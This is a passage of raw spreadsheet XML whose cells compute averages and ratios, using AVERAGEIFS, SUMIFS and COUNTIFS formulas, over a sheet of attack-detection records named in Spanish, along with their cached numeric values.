        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>788.3911657</v>
      </c>
      <c r="BO156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="BT156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0.162601626</v>
      </c>
      <c r="CA156" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC156" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="CG156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>8</v>
      </c>
      <c r="CL156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>1.5</v>
      </c>
      <c r="CN156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="CP156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>11.5</v>
      </c>
      <c r="CQ156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.1399934292</v>
      </c>
      <c r="CT156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.001996007984</v>
      </c>
      <c r="CU156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>1.5</v>
      </c>
      <c r="CZ156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="DI156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ156" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>0.09090909091</v>
      </c>
      <c r="DK156" s="271"/>
    </row>
    <row r="157">
      <c r="J157" s="277"/>
      <c r="K157" s="512"/>
      <c r="L157" s="512"/>
      <c r="M157" s="512"/>
      <c r="N157" s="512"/>
      <c r="O157" s="278"/>
      <c r="Q157" s="271"/>
      <c r="R157" s="352" t="s">
        <v>2579</v>
      </c>
      <c r="S157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.5857605178</v>
      </c>
      <c r="T157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>1.409649123</v>
      </c>
      <c r="V157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>8.21875</v>
      </c>
      <c r="W157" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>28</v>
      </c>
      <c r="X157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>2652.714286</v>
      </c>
      <c r="Y157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>159.6666667</v>
      </c>
      <c r="Z157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>8341.880148</v>
      </c>
      <c r="AA157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>1.599046279</v>
      </c>
      <c r="AB157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>22.359375</v>
      </c>
      <c r="AC157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>4.8</v>
      </c>
      <c r="AD157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>1.101596806</v>
      </c>
      <c r="AE157" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>1.92</v>
      </c>
      <c r="AF157" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DH$3:$DH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>7.728756131</v>
      </c>
      <c r="AG157" s="271"/>
      <c r="AH157" s="352" t="s">
        <v>2579</v>
      </c>
      <c r="AI157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.0145631068</v>
      </c>
      <c r="AJ157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>2.5</v>
      </c>
      <c r="AL157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.6526315789</v>
      </c>
      <c r="AR157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>1.166666667</v>
      </c>
      <c r="AS157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>3</v>
      </c>
      <c r="AU157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>3.5</v>
      </c>
      <c r="AV157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>2</v>
      </c>
      <c r="AW157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>2.875</v>
      </c>
      <c r="AY157" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>1</v>
      </c>
      <c r="BA157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>28</v>
      </c>
      <c r="BB157" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>6189.666667</v>
      </c>
      <c r="BD157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>792</v>
      </c>
      <c r="BI157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>14981.65935</v>
      </c>
      <c r="BN157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>1084.766166</v>
      </c>
      <c r="BO157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>6</v>
      </c>
      <c r="BT157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ157" s="518">
